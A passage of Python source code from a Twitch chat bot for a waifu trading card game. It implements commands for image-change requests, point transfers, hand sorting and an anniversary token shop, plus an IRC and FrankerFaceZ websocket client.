"%s, you haven't bought any boosters yet! Buy your first with !booster buy." %
tags['display-name'], isWhisper)
return
totalspending = getSpendings(tags['user-id'])
packstr = ", ".join("%dx %s" % (row[1], row[0]) for row in packstats)
self.message(channel, "%s, you have spent %d total points on the following packs: %s." % (
tags['display-name'], totalspending, packstr), isWhisper)
if checkHandUpgrade(tags["user-id"]):
self.message(channel, "... and this was enough to upgrade your hand to a new slot! naroYay",
isWhisper)
return
if command == "godimage":
canManageImages = sender in superadmins
godRarity = int(config["numNormalRarities"]) - 1
if len(args) < 1:
if canManageImages:
self.message(channel, "Usage: !godimage change / queue / check / accept / reject", isWhisper)
else:
self.message(channel, "Usage: !godimage change / list / cancel", isWhisper)
return
subcmd = args[0].lower()
if subcmd in ["change", "request"]:
if len(args) < 3:
self.message(channel, "Usage: !godimage change[global] <id> <link>", isWhisper)
return
hand = getHand(tags['user-id'])
try:
card = parseHandCardSpecifier(hand, args[1], godRarity)
except CardNotInHandException:
self.message(channel, "%s, you don't own that waifu/card or it isn't god rarity!" % tags['display-name'],
isWhisper)
return
except AmbiguousWaifuException:
self.message(channel,
"%s, you own more than one god card of waifu %s! Please specify a card ID instead. You can find card IDs using !checkhand" % (
tags['display-name'], args[1]), isWhisper)
return
except ValueError:
self.message(channel, "Only whole numbers/IDs please.", isWhisper)
return
with db.cursor() as cur:
if card["base_rarity"] == godRarity:
self.message(channel, "Base god rarity waifus cannot have their picture changed!", isWhisper)
return
cur.execute("SELECT COALESCE(MAX(created), 0) FROM godimage_requests WHERE state = 'accepted' AND cardid = %s", [card['cardid']])
lastRequest = cur.fetchone()[0]
cooldown = lastRequest + int(config["imageChangeCooldownDays"])*86400000 - current_milli_time()
if cooldown > 0:
datestring = formatTimeDelta(cooldown, False)
self.message(channel, "Sorry, that card has had its image changed too recently. Please try again in %s" % datestring, isWhisper)
return
try:
validateWaifuURL(args[2])
except ValueError as ex:
self.message(channel, "Invalid link specified. %s" % str(ex), isWhisper)
return
except Exception:
self.message(channel, "There was an unknown problem with the link you specified. Please try again later.", isWhisper)
return
# cancel any old pending requests for this card
cur.execute("UPDATE godimage_requests SET state = 'cancelled', updated = %s WHERE cardid = %s AND state = 'pending'", [current_milli_time(), card['cardid']])
# record a new request
insertArgs = [tags['user-id'], card['cardid'], args[2], current_milli_time()]
cur.execute("INSERT INTO godimage_requests (requesterid, cardid, image, state, created) VALUES(%s, %s, %s, 'pending', %s)", insertArgs)
# notify the discordhook of the new request
discordArgs = {"user": tags['display-name'], "waifuid": card['waifuid'], "cardid": card['cardid'], "name": card["name"], "image": args[2]}
discordbody = {
"username": "WTCG Admin",
"content" : "{user} requested an image change for [{waifuid}] {name} to <{image}>!\nUse `!godimage check {cardid}` in any chat to check it.".format(**discordArgs)
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel, "Your request has been placed. You will be notified when bot staff accept or decline it.", isWhisper)
return
elif subcmd == "list":
with db.cursor() as cur:
cur.execute("SELECT waifus.id, waifus.name FROM godimage_requests gr JOIN cards ON gr.cardid=cards.id JOIN waifus ON cards.waifuid = waifus.id WHERE gr.requesterid = %s AND gr.state = 'pending'", [tags['user-id']])
reqs = cur.fetchall()
if len(reqs) == 0:
self.message(channel, "You don't have any pending god image change requests.", isWhisper)
else:
reqList = ", ".join(["[%d] %s" % (req[0], req[1]) for req in reqs])
self.message(channel, "%s, you have pending image change requests for: %s." % (tags['display-name'], reqList), isWhisper)
return
elif subcmd == "cancel":
if len(args) < 2:
self.message(channel, "Usage: !godimage cancel <id>", isWhisper)
return
hand = getHand(tags['user-id'])
try:
card = parseHandCardSpecifier(hand, args[1], godRarity)
except CardNotInHandException:
self.message(channel, "%s, you don't own that waifu/card or it isn't god rarity!" % tags['display-name'],
isWhisper)
return
except AmbiguousWaifuException:
self.message(channel,
"%s, you own more than one god card of waifu %s! Please specify a card ID instead. You can find card IDs using !checkhand" % (
tags['display-name'], args[1]), isWhisper)
return
except ValueError:
self.message(channel, "Only whole numbers/IDs please.", isWhisper)
return
with db.cursor() as cur:
cur.execute("UPDATE godimage_requests SET state = 'cancelled', updated = %s WHERE cardid = %s AND state = 'pending'", [current_milli_time(), card['cardid']])
if cur.rowcount > 0:
# send discord notif
discordArgs = {"user": tags['display-name'], "id": card['waifuid'], "name": card["name"]}
discordbody = {
"username": "WTCG Admin",
"content" : "{user} cancelled their image change request for [{id}] {name}.".format(**discordArgs)
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel, "You cancelled your image change request for [%d] %s." % (card['waifuid'], card["name"]), isWhisper)
else:
self.message(channel, "You didn't have a pending image change request for that waifu.", isWhisper)
return
elif subcmd == "queue" and canManageImages:
with db.cursor() as cur:
cur.execute("SELECT cardid FROM godimage_requests WHERE state = 'pending' ORDER BY created ASC")
queue = cur.fetchall()
if len(queue) == 0:
self.message(channel, "The request queue is currently empty.", isWhisper)
else:
queueStr = ", ".join(str(item[0]) for item in queue)
self.message(channel, "Current requested IDs for image changes: %s. !godimage check <id> to see each request." % queueStr, isWhisper)
return
elif canManageImages and subcmd in ["check", "acceptsingle", "accept", "reject"]:
if len(args) < 2:
self.message(channel, "Usage: !godimage %s <card id>" % subcmd, isWhisper)
return
try:
cardid = int(args[1])
except ValueError:
self.message(channel, "Usage: !godimage %s <card id>" % subcmd, isWhisper)
return
with db.cursor() as cur:
cur.execute("SELECT gr.id, gr.image, users.id, users.name, waifus.id, waifus.name, cards.id FROM godimage_requests gr"
+ " JOIN cards ON gr.cardid = cards.id"
+ " JOIN users ON gr.requesterid = users.id"
+ " JOIN waifus ON cards.waifuid = waifus.id"
+ " WHERE gr.cardid = %s AND gr.state = 'pending'", [cardid])
request = cur.fetchone()
if request is None:
self.message(channel, "There is no pending request for that card.", isWhisper)
return
if subcmd == "check":
msgArgs = {"user": request[3], "waifuid": request[4], "name": request[5], "image": request[1], "cardid": request[6]}
self.message(channel, ("{user} requested their copy of [{waifuid}] {name}'s image to be changed to {image} ." +
" You can accept this request with !godimage accept {cardid}" +
" or deny it with !godimage reject {cardid} <reason>.").format(**msgArgs), isWhisper)
elif subcmd == "reject":
if len(args) < 3:
self.message(channel, "You must provide a reason to reject the request. If it is porn/illegal/etc, just ban the user.", isWhisper)
return
rejectionReason = " ".join(args[2:])
queryArgs = [tags['user-id'], current_milli_time(), rejectionReason, request[0]]
cur.execute("UPDATE godimage_requests SET state = 'rejected', moderatorid = %s, updated = %s, rejection_reason = %s WHERE id = %s", queryArgs)
# notify them
self.message("#%s" % request[3], "Your image change request for [%d] %s was rejected with the following reason: %s" % (request[4], request[5], rejectionReason), True)
self.message(channel, "Request rejected and user notified.", isWhisper)
else:
# update it
try:
hostedURL = processWaifuURL(request[1])
except Exception as ex:
self.message(channel, "Could not process image. %s. Check the URL yourself and if it is invalid reject their request." % str(ex), isWhisper)
return
updateCard(request[6], {"customImage": hostedURL})
queryArgs = [tags['user-id'], current_milli_time(), request[0]]
cur.execute("UPDATE godimage_requests SET state = 'accepted', moderatorid = %s, updated = %s WHERE id = %s", queryArgs)
# notify them
self.message("#%s" % request[3], "Your image change request for your copy of [%d] %s was accepted." % (request[4], request[5]), True)
self.message(channel, "Request accepted. The new image for %s's copy of [%d] %s is %s" % (request[3], request[4], request[5], hostedURL), isWhisper)
return
if command == "sendpoints":
# expire old points transfers
with db.cursor(pymysql.cursors.DictCursor) as cur:
cur.execute("UPDATE points_transfers SET status = 'expired' WHERE status = 'pending' AND created <= %s", [current_milli_time() - int(config["pointsTransferExpiryMinutes"])*60000])
if len(args) < 2:
self.message(channel, "Usage: !sendpoints <user> <amount> <reason> OR !sendpoints confirm <code>", isWhisper)
return
if args[0].lower() == "confirm":
code = args[1]
cur.execute("SELECT pt.*, users.name AS toName FROM points_transfers AS pt JOIN users ON pt.toid = users.id WHERE pt.fromid = %s ORDER BY pt.id DESC LIMIT 1", [tags['user-id']])
transfer = cur.fetchone()
if transfer is None or transfer["status"] in ["confirmed", "confirm_failed"]:
self.message(channel, "%s, you have no pending points transfer." % tags['display-name'], isWhisper)
return
if transfer["status"] == "expired":
self.message(channel, "%s, your points transfer has expired. Please try sending a new one." % tags['display-name'], isWhisper)
return
if "%s-%d" % (transfer["toName"], transfer["paid"]) != code:
cur.execute("UPDATE points_transfers SET status='confirm_failed' WHERE id = %s", [transfer["id"]])
self.message(channel, "%s, the confirmation code you entered was wrong. Please try sending a new points transfer." % tags['display-name'], isWhisper)
return
if not hasPoints(tags['user-id'], transfer["paid"]):
cur.execute("UPDATE points_transfers SET status='confirm_failed' WHERE id = %s", [transfer["id"]])
self.message(channel, "%s, you no longer have enough points to complete this transfer. Please try sending a new points transfer." % tags['display-name'], isWhisper)
return
addPoints(tags['user-id'], -transfer["paid"])
addPoints(transfer["toid"], transfer["sent"])
if int(transfer["sent"]) >= int(config["pointsTransferMinWhisperAmount"]):
self.message("#%s" % transfer["toName"], "%s sent you %d points with the reason: %s" % (tags["display-name"], transfer["sent"], transfer["reason"]), True)
cur.execute("UPDATE points_transfers SET status='confirmed', confirmed=%s WHERE id = %s", [current_milli_time(), transfer["id"]])
self.message(channel, "%s, you successfully paid %d points to send %d points to %s." % (tags["display-name"], transfer["paid"], transfer["sent"], transfer["toName"]))
else:
if len(args) < 3:
self.message(channel, "Usage: !sendpoints <user> <amount> <reason>", isWhisper)
return
otherparty = args[0].lower()
cur.execute("SELECT id FROM users WHERE name = %s", [otherparty])
otheridrow = cur.fetchone()
if otheridrow is None:
self.message(channel, "I don't recognize that username.", isWhisper)
return
otherid = int(otheridrow["id"])
if otherid == int(tags['user-id']):
self.message(channel, "You can't send points to yourself.", isWhisper)
return
try:
amount = int(args[1])
except ValueError:
self.message(channel, "Invalid amount of points entered.", isWhisper)
return
if amount <= 0 or amount > int(config["pointsTransferMaxAmount"]):
self.message(channel, "Invalid amount of points entered.", isWhisper)
return
reason = " ".join(args[2:])
if len(reason) < 10:
self.message(channel, "Your reason for the transfer must be at least 10 characters long.")
return
toPay = amount * 2
if not hasPoints(tags['user-id'], toPay):
self.message(channel, "You don't have enough points to send %d points. You need %d." % (amount, toPay), isWhisper)
return
insertArgs = [tags['user-id'], otherid, amount, toPay, current_milli_time(), reason]
cur.execute("INSERT INTO points_transfers (fromid, toid, sent, paid, status, created, reason) VALUES(%s, %s, %s, %s, 'pending', %s, %s)", insertArgs)
msgArgs = (tags["display-name"], amount, otherparty, toPay, otherparty, toPay)
self.message(channel, "%s, you want to send %d points to %s. This will cost you %d points. To confirm this action, enter !sendpoints confirm %s-%d" % msgArgs, isWhisper)
return
if command == "sorthand":
if len(args) == 0 or (args[0].lower() != "reset" and len(args) < 2):
self.message(channel, "Usage: !sorthand <comma-delimited card ids> <comma-delimited positions> OR !sorthand reset", isWhisper)
return
with db.cursor() as cur:
if args[0].lower() == "reset":
cur.execute("UPDATE cards SET sortValue = NULL WHERE userid = %s", [tags['user-id']])
self.message(channel, "Successfully reset %s's hand to default sort order." % tags['display-name'], isWhisper)
else:
if args[0].count(",") != args[1].count(","):
self.message(channel, "You must provide an equal amount of waifu/card IDs and sort values.")
return
cardSpecifiers = args[0].split(",")
sortValueStrings = args[1].split(",")
seenIDs = []
updatePairs = []
hand = getHand(tags['user-id'])
for i in range(len(cardSpecifiers)):
try:
card = parseHandCardSpecifier(hand, cardSpecifiers[i])
if card['cardid'] in seenIDs:
self.message(channel, "You entered the same card twice!", isWhisper)
return
seenIDs.append(card['cardid'])
sortValue = int(sortValueStrings[i])
if sortValue < -32768 or sortValue > 32767:
self.message(channel, "Invalid sort value entered. Valid values are -32768 to 32767 inclusive.", isWhisper)
return
updatePairs.append([sortValue, card['cardid']])
except CardNotInHandException:
self.message(channel, "%s, you don't own that waifu/card!" % tags['display-name'],
isWhisper)
return
except AmbiguousWaifuException:
self.message(channel,
"%s, you own more than one rarity of waifu %s! Please specify a card ID instead. You can find card IDs using !checkhand" % (
tags['display-name'], cardSpecifiers[i]), isWhisper)
return
except ValueError:
self.message(channel, "Only whole numbers/IDs please.", isWhisper)
return
cur.executemany("UPDATE cards SET sortValue = %s WHERE id = %s", updatePairs)
self.message(channel, "Updated sort values for %d cards in %s's hand." % (len(updatePairs), tags['display-name']), isWhisper)
return
if command == "autogacha" and sender in superadmins:
tokenName = config["eventTokenName"]
with db.cursor() as cur:
cur.execute("SELECT id, name, eventTokens FROM users WHERE eventTokens > 0 ORDER BY eventTokens DESC")
holders = cur.fetchall()
for holder in holders:
fullPrizes = []
userid = int(holder[0])
for i in range(int(holder[2])):
roll = tokenGachaRoll()
prizes = []
if "pack" in roll["prize"]:
giveFreeBooster(userid, roll["prize"]["pack"], roll["prize"]["amount"])
prizes.append("%dx %s pack (!freepacks open %s)" % (roll["prize"]["amount"], roll["prize"]["pack"], roll["prize"]["pack"]))
if "points" in roll["prize"]:
addPoints(userid, roll["prize"]["points"])
prizes.append("%d points" % roll["prize"]["points"])
if "pudding" in roll["prize"]:
addPudding(userid, roll["prize"]["pudding"])
prizes.append("%d pudding" % roll["prize"]["pudding"])
fullPrizes.append("[%d◆] %s" % (roll["tier"], " and ".join(prizes)))
messages = ["Your %d leftover %s(s) were fed into the Token Gacha and you got: " % (holder[2], tokenName)]
first = True
for prizeStr in fullPrizes:
if len(messages[-1]) + len(prizeStr) > 398:
messages.append(prizeStr)
elif first:
messages[-1] += prizeStr
else:
messages[-1] += ", " + prizeStr
first = False
for message in messages:
self.message('#' + holder[1], message, True)
cur.execute("UPDATE users SET eventTokens = 0")
self.message(channel, "Done.", isWhisper)
return
if command == "tokenshop":
if not booleanConfig("annivShopOpen"):
return
promoCost = int(config["annivPromoBaseCost"])
maxPromos = int(config["annivMaxPromos"])
specialCost = int(config["annivSpecialCost"])
huCost = int(config["annivHandUpgradeCost"])
with db.cursor() as cur:
cur.execute("SELECT annivPromosBought, annivSpecialBought, annivHandUpgradeBought, eventTokens FROM users WHERE id = %s", [tags['user-id']])
purchaseData = cur.fetchone()
subcmd = "" if not len(args) else args[0].lower()
if booleanConfig("annivShopSpecialOnly") and subcmd not in ["special", "specialadmin"]:
self.message(channel, "Token Shop purchases are closed for this year, thanks for playing! If you've already purchased a Special and don't have it in your hand yet, you still have access to !tokenshop special commands.", isWhisper)
return
if subcmd == "gacha":
tokenName = config["eventTokenName"]
if len(args) == 1 or args[1].lower() != "roll":
self.message(channel, "!tokenshop gacha roll to try your luck on the %s Gacha. 1 %s per go." % (tokenName, tokenName), isWhisper)
return
# check the user's tokens
cur.execute("SELECT eventTokens FROM users WHERE id = %s", [tags['user-id']])
tokens = cur.fetchone()[0] or 0
if tokens < 1:
self.message(channel, "You don't have any %ss to roll the Gacha with." % (tokenName), isWhisper)
return
cur.execute("UPDATE users SET eventTokens = eventTokens - 1 WHERE id = %s", [tags['user-id']])
roll = tokenGachaRoll()
prizes = []
if "pack" in roll["prize"]:
giveFreeBooster(tags['user-id'], roll["prize"]["pack"], roll["prize"]["amount"])
prizes.append("%dx %s pack (!freepacks open %s)" % (roll["prize"]["amount"], roll["prize"]["pack"], roll["prize"]["pack"]))
if "points" in roll["prize"]:
addPoints(tags['user-id'], roll["prize"]["points"])
prizes.append("%d points" % roll["prize"]["points"])
if "pudding" in roll["prize"]:
addPudding(tags['user-id'], roll["prize"]["pudding"])
prizes.append("%d pudding" % roll["prize"]["pudding"])
prizeStr = " and ".join(prizes)
self.message(channel, "%s, you roll the %s Gacha and you get: [%d◆] %s" % (tags['display-name'], tokenName, roll["tier"], prizeStr), isWhisper)
return
if subcmd == "buy":
if len(args) < 2:
self.message(channel, "Usage: !tokenshop buy special | !tokenshop buy handupgrade | !tokenshop buy <promo waifu id>", isWhisper)
return
target = args[1].lower()
if target == "special":
if purchaseData[1]:
self.message(channel, "%s, you've already bought a special card! Pick another reward." % tags['display-name'], isWhisper)
return
if purchaseData[3] < specialCost:
msgArgs = (tags['display-name'], specialCost, purchaseData[3])
self.message(channel, "%s, you can't afford a special card! They cost %d tokens and you only have %d." % msgArgs, isWhisper)
return
# ok, make the purchase
cur.execute("UPDATE users SET eventTokens = eventTokens - %s, annivSpecialBought = 1 WHERE id = %s", [specialCost, tags['user-id']])
cur.execute("INSERT INTO special_requests (requesterid, state, created) VALUES(%s, 'notsent', %s)", [tags['user-id'], current_milli_time()])
self.message(channel, "%s, you bought a special card for %d tokens! You now have access to !tokenshop special which you can use to set the name/series/image of your special before submitting it for review." % (tags['display-name'], specialCost), isWhisper)
discordbody = {
"username": "WTCG Admin",
"content" : "%s just bought a Special from the token shop." % tags['display-name']
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
elif target == "handupgrade":
if purchaseData[2]:
self.message(channel, "%s, you've already bought a hand upgrade! Pick another reward." % tags['display-name'], isWhisper)
return
if purchaseData[3] < huCost:
msgArgs = (tags['display-name'], huCost, purchaseData[3])
self.message(channel, "%s, you can't afford a hand upgrade! They cost %d tokens and you only have %d." % msgArgs, isWhisper)
return
# ok, make the purchase
cur.execute("UPDATE users SET eventTokens = eventTokens - %s, annivHandUpgradeBought = 1, freeUpgrades = freeUpgrades + 1 WHERE id = %s", [huCost, tags['user-id']])
self.message(channel, "%s, you bought a hand upgrade for %d tokens! You can begin using it immediately." % (tags['display-name'], huCost), isWhisper)
else:
# promo
if purchaseData[0] >= maxPromos:
self.message(channel, "%s, you have already bought the maximum of %d promos. Pick another reward." % (tags['display-name'], maxPromos), isWhisper)
return
promoPrice = promoCost * (purchaseData[0] + 1)
if purchaseData[3] < promoPrice:
msgArgs = (tags['display-name'], promoPrice, purchaseData[3])
self.message(channel, "%s, you can't afford a promo! Your current cost for one is %d tokens and you only have %d." % msgArgs, isWhisper)
return
promoCard = getWaifuById(target)
if promoCard is None:
self.message(channel, "%s, you entered an invalid waifu ID." % tags['display-name'], isWhisper)
return
if not promoCard["can_purchase"]:
self.message(channel, "%s, that waifu cannot be bought. !tokenshop listpromos to get a list of buyable promos." % tags['display-name'], isWhisper)
return
addCard(tags['user-id'], promoCard['id'], 'other', None, int(config["numNormalRarities"]) + int(config["numSpecialRarities"]) - 1)
cur.execute("UPDATE users SET eventTokens = eventTokens - %s, annivPromosBought = annivPromosBought + 1 WHERE id = %s", [promoPrice, tags['user-id']])
if purchaseData[0] + 1 < maxPromos:
msgArgs = (tags['display-name'], promoCard['id'], promoCard['name'], promoPrice, purchaseData[0] + 1, promoPrice + promoCost)
self.message(channel, "%s, you bought a copy of [%d] %s for %d tokens. You have now bought %d promos so your next one will cost %d tokens." % msgArgs, isWhisper)
else:
msgArgs = (tags['display-name'], promoCard['id'], promoCard['name'], promoPrice, purchaseData[0] + 1)
self.message(channel, "%s, you bought a copy of [%d] %s for %d tokens. You have now bought %d promos so you cannot buy any more." % msgArgs, isWhisper)
elif subcmd == "listpromos":
self.message(channel, "%s, you can view the list of promos buyable with tokens here - %s" % (tags['display-name'], config["tokenPromoList"]), isWhisper)
elif subcmd == "specialadmin" and sender in superadmins:
spclcmd = "" if len(args) < 2 else args[1].lower()
if spclcmd in ["check", "accept", "reject"]:
if len(args) < 3:
self.message(channel, "Usage: !tokenshop specialadmin check/accept/reject <username>")
return
cur.execute("SELECT sr.requesterid, sr.name, sr.series, sr.image FROM special_requests sr JOIN users ON sr.requesterid=users.id WHERE users.name = %s AND sr.state = 'pending'", [args[2]])
requestInfo = cur.fetchone()
if requestInfo is None:
self.message(channel, "That user doesn't have a pending Special card request.", isWhisper)
return
if spclcmd == "check":
msgArgs = (args[2], requestInfo[1], requestInfo[2], requestInfo[3], args[2], args[2])
self.message(channel, "%s requested a Special card of %s from %s with image %s . Accept it with !tokenshop specialadmin accept %s or reject it with !tokenshop specialadmin reject %s <reason>." % msgArgs, isWhisper)
elif spclcmd == "accept":
# create waifu
try:
hostedURL = processWaifuURL(requestInfo[3])
except Exception as ex:
self.message(channel, "Could not process image. %s. Check the URL yourself and if it is invalid reject their request." % str(ex), isWhisper)
return
queryArgs = [requestInfo[1], hostedURL, int(config["numNormalRarities"]), requestInfo[2]]
cur.execute("INSERT INTO waifus (name, image, base_rarity, series) VALUES(%s, %s, %s, %s)", queryArgs)
waifuid = cur.lastrowid
addCard(requestInfo[0], waifuid, 'other')
cur.execute("UPDATE special_requests SET state = 'accepted', moderatorid = %s, updated = %s WHERE requesterid = %s", [tags['user-id'], current_milli_time(), requestInfo[0]])
self.message(channel, "Request accepted. Created Special card ID %d and gave it to %s." % (waifuid, args[2]), isWhisper)
self.message('#%s' % args[2].lower(), "Your Special card request for %s from %s was accepted." % (requestInfo[1], requestInfo[2]), True)
else:
# reject
if len(args) < 4:
self.message(channel, "Rejection reason is required.", isWhisper)
return
rejectionReason = " ".join(args[3:])
cur.execute("UPDATE special_requests SET state = 'rejected', moderatorid = %s, updated = %s, rejection_reason = %s, changed_since_rejection = 0 WHERE requesterid = %s", [tags['user-id'], current_milli_time(), rejectionReason, requestInfo[0]])
self.message('#%s' % args[2].lower(), "Your Special card request for %s from %s was rejected for the following reason: %s. Please adjust it with !tokenshop special and then resubmit." % (requestInfo[1], requestInfo[2], rejectionReason), True)
self.message(channel, "Request rejected and user notified.", isWhisper)
else:
# list pending
cur.execute("SELECT users.name FROM special_requests sr JOIN users ON sr.requesterid=users.id WHERE sr.state='pending' ORDER BY sr.updated ASC")
results = cur.fetchall()
if not results:
self.message(channel, "There are no pending Special card requests right now.", isWhisper)
else:
self.message(channel, "Special card requests have been received from: %s. Use !tokenshop specialadmin check <username> for details." % (", ".join([row[0] for row in results])), isWhisper)
elif subcmd == "special":
if not purchaseData[1]:
self.message(channel, "%s, you haven't bought a Special card with tokens yet!" % tags['display-name'], isWhisper)
return
spclcmd = "" if len(args) < 2 else args[1].lower()
cur.execute("SELECT name, series, image, state, updated, rejection_reason, changed_since_rejection FROM special_requests WHERE requesterid = %s", [tags['user-id']])
specialData = cur.fetchone()
if specialData is None:
cur.execute("INSERT INTO special_requests (requesterid, state, created) VALUES(%s, 'notsent', %s)", [tags['user-id'], current_milli_time()])
specialData = [None, None, None, 'notsent', None, None, 0]
if spclcmd in ["name", "series", "image", "submit", "confirm"] and specialData[3] not in["notsent", "rejected"]:
if specialData[3] == "pending":
self.message(channel, "%s, you have already sent in your Special card request! Please wait for a response." % tags['display-name'], isWhisper)
else:
self.message(channel, "%s, your Special card request has already been accepted!" % tags['display-name'], isWhisper)
return
if spclcmd in ["submit", "confirm"] and specialData[3] == "rejected" and not specialData[6]:
self.message(channel, "%s, you haven't changed your request at all since its rejection! Please review the rejection reason (%s) and make adjustments before resubmitting." % (tags['display-name'], specialData[5]), isWhisper)
return
if spclcmd in ["submit", "confirm"] and (specialData[0] is None or specialData[1] is None or specialData[2] is None):
self.message(channel, "%s, you haven't finished filling in the info for your Special card request yet! Please specify all 3 of name/series/image before continuing." % tags['display-name'], isWhisper)
return
if spclcmd in ["name", "series", "image"] and len(args) < 3:
self.message(channel, "Usage: !tokenshop special name <name> / series <series> / image <image URL> / submit")
return
if spclcmd == "name":
name = (" ".join(args[2:])).strip()
if not len(name) or len(name) > 50:
self.message(channel, "Please enter a waifu name of between 1 and 50 characters.", isWhisper)
return
queryArgs = [name, current_milli_time(), tags['user-id']]
cur.execute("UPDATE special_requests SET name = %s, changed_since_rejection = 1, updated = %s WHERE requesterid = %s", queryArgs)
self.message(channel, "%s -> Set the name for your Special card request to %s." % (tags['display-name'], name), isWhisper)
elif spclcmd == "series":
series = (" ".join(args[2:])).strip()
if not len(series) or len(series) > 50:
self.message(channel, "Please enter a waifu series of between 1 and 50 characters.", isWhisper)
return
queryArgs = [series, current_milli_time(), tags['user-id']]
cur.execute("UPDATE special_requests SET series = %s, changed_since_rejection = 1, updated = %s WHERE requesterid = %s", queryArgs)
self.message(channel, "%s -> Set the series for your Special card request to %s." % (tags['display-name'], series), isWhisper)
elif spclcmd == "image":
try:
validateWaifuURL(args[2])
except ValueError as ex:
self.message(channel, "Invalid image link specified. %s" % str(ex), isWhisper)
return
except Exception:
self.message(channel, "There was an unknown problem with the image link you specified. Please try again later.", isWhisper)
return
queryArgs = [args[2], current_milli_time(), tags['user-id']]
cur.execute("UPDATE special_requests SET image = %s, changed_since_rejection = 1, updated = %s WHERE requesterid = %s", queryArgs)
self.message(channel, "%s -> Set the image for your Special card request to %s" % (tags['display-name'], args[2]), isWhisper)
elif spclcmd == "submit":
self.message(channel, "%s, please confirm that you want a Special card of %s from %s with image %s by entering !tokenshop special confirm. You cannot change your submission after it is confirmed so please be careful." % (tags['display-name'], specialData[0], specialData[1], specialData[2]), isWhisper)
elif spclcmd == "confirm":
# TODO submit to admin discordhook
discordargs = (tags['display-name'], specialData[0], specialData[1], specialData[2], sender)
discordbody = {
"username": "WTCG Admin",
"content" : "%s submitted their request for a Special Card:\nName: %s\nSeries: %s\nImage: %s\nUse `!tokenshop specialadmin check %s` in any chat to check it." % discordargs
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
cur.execute("UPDATE special_requests SET state = 'pending' WHERE requesterid = %s", [tags['user-id']])
self.message(channel, "%s, your Special card request has been submitted for approval. Keep an eye on your whispers to see if it is accepted or rejected. If it is rejected you'll be able to resubmit after you fix the problems." % tags['display-name'], isWhisper)
else:
# show status
if specialData[3] == "accepted":
self.message(channel, "%s, your Special card request of %s from %s was accepted." % (tags['display-name'], specialData[0], specialData[1]), isWhisper)
elif specialData[3] == "rejected":
if specialData[6]:
self.message(channel, "%s, your previous submission was rejected for the following reason: %s. Your current submission is %s from %s with image %s . !tokenshop special name/image/series to change details or !tokenshop special submit to submit it for approval." % (tags['display-name'], specialData[5], specialData[0], specialData[1], specialData[2]), isWhisper)
else:
self.message(channel, "%s, your submission of %s from %s with image %s was rejected for the following reason: %s. Please use !tokenshop special name/image/series to change details to solve the problems and then !tokenshop special submit to resubmit it for approval." % (tags['display-name'], specialData[0], specialData[1], specialData[2], specialData[5]), isWhisper)
elif specialData[3] == "pending":
self.message(channel, "%s, your Special card request of %s from %s is still pending approval. Please wait patiently." % (tags['display-name'], specialData[0], specialData[1]), isWhisper)
else:
name = specialData[0] or "<no name yet>"
series = specialData[1] or "<no series yet>"
image = specialData[2] or "<no image yet>"
if specialData[0] and specialData[1] and specialData[2]:
self.message(channel, "%s, your current Special request is %s from %s with image %s . Use !tokenshop special name/image/series to change details or !tokenshop special submit to submit it for approval." % (tags['display-name'], name, series, image), isWhisper)
elif specialData[0] or specialData[1] or specialData[2]:
self.message(channel, "%s, your current Special request is %s from %s with image %s . Use !tokenshop special name/image/series to add the missing details and then !tokenshop special submit to submit it for approval." % (tags['display-name'], name, series, image), isWhisper)
else:
self.message(channel, "%s, you haven't started on your Special request yet. Use !tokenshop special name/image/series to add the required details and then !tokenshop special submit to submit it for approval." % tags['display-name'], isWhisper)
else:
# list items
purchasable = []
if purchaseData[0] < maxPromos:
promoPrice = promoCost * (purchaseData[0] + 1)
purchasable.append("Promo card - current cost %d tokens (%d already bought, %d max) - !tokenshop buy <waifu id> (!tokenshop listpromos for a list)" % (promoPrice, purchaseData[0], maxPromos))
if not purchaseData[1]:
purchasable.append("Special card - cost %d tokens - !tokenshop buy special" % specialCost)
if not purchaseData[2]:
purchasable.append("Hand upgrade - cost %d tokens - !tokenshop buy handupgrade" % huCost)
purchasable.append("Gacha roll - costs 1 token - !tokenshop gacha roll")
self.message(channel, "%s, you have %d Anniversary Tokens. Items currently available to you: %s" % (tags['display-name'], purchaseData[3], " / ".join(purchasable)), isWhisper)
return
class MarathonBot(pydle.Client):
instance = None
pw=None
def __init__(self):
super().__init__(config["marathonChannel"][1:])
MarathonBot.instance = self
self.ffz = MarathonFFZWebsocket(config["marathonChannel"][1:])
def start(self, password):
pool.connect(self, "irc.twitch.tv", 6667, tls=False, password=password)
self.pw = password
logger.info("Connecting MarathonBot...")
def on_disconnect(self, expected):
logger.warning("MarathonBot Disconnected, reconnecting....")
pool.connect(self, "irc.twitch.tv", 6667, tls=False, password=self.pw, reconnect=True)
def on_connect(self):
super().on_connect()
logger.info("MarathonBot Joining")
def on_message(self, source, target, message):
logger.debug("message on MarathonBot: %s, %s, %s", str(source), str(target), message)
def updateFollowButtons(self, channels):
if self.ffz is None:
self.ffz = MarathonFFZWebsocket(config["marathonChannel"][1:], channels)
else:
self.ffz.updateFollowButtons(channels)
def message(self, *args):
logger.info("MarathonBot Sending "+str(args))
super().message(*args)
class MarathonFFZWebsocket:
def __init__(self, channelName, newFollowButtons=None):
self.channelName = channelName
self.messageNumber = 0
self.queuedChanges = []
self.initDone = False
if newFollowButtons is not None:
self.queuedChanges.append(newFollowButtons)
self.ws = websocket.WebSocketApp(ffzws, on_message = self.on_message, on_error = self.on_error, on_close = self.on_close)
self.ws.on_open = self.on_open
thread.start_new_thread(self.ws.run_forever, (), {"origin": ""})
def sendMessage(self, message):
self.messageNumber += 1
self.ws.send("%d %s" % (self.messageNumber, message))
def on_open(self):
self.sendMessage('hello ["waifutcg-ffzclient",false]')
def on_message(self, message):
logger.debug("Websocket recv: "+message)
code, msg = message.split(" ", 1)
code = int(code)
if code == -1:
# probably authorize
if msg.startswith("do_authorize"):
# must send auth code
authCode = json.loads(msg[13:])
logger.debug("trying to authenticate with FFZ "+authCode)
MarathonBot.instance.message("#frankerfacezauthorizer", "AUTH "+authCode)
elif code == self.messageNumber and self.messageNumber < 5 and msg.split(" ")[0] == "ok":
# send the rest of the intro
if self.messageNumber == 1:
self.sendMessage('setuser %s' % json.dumps(self.channelName))
elif self.messageNumber == 2:
self.sendMessage('sub %s' % json.dumps('room.'+self.channelName))
elif self.messageNumber == 3:
self.sendMessage('sub %s' % json.dumps('channel.'+self.channelName))
else:
self.sendMessage('ready 0')
elif code >= 5 and self.messageNumber >= 5 and len(self.queuedChanges) > 0:
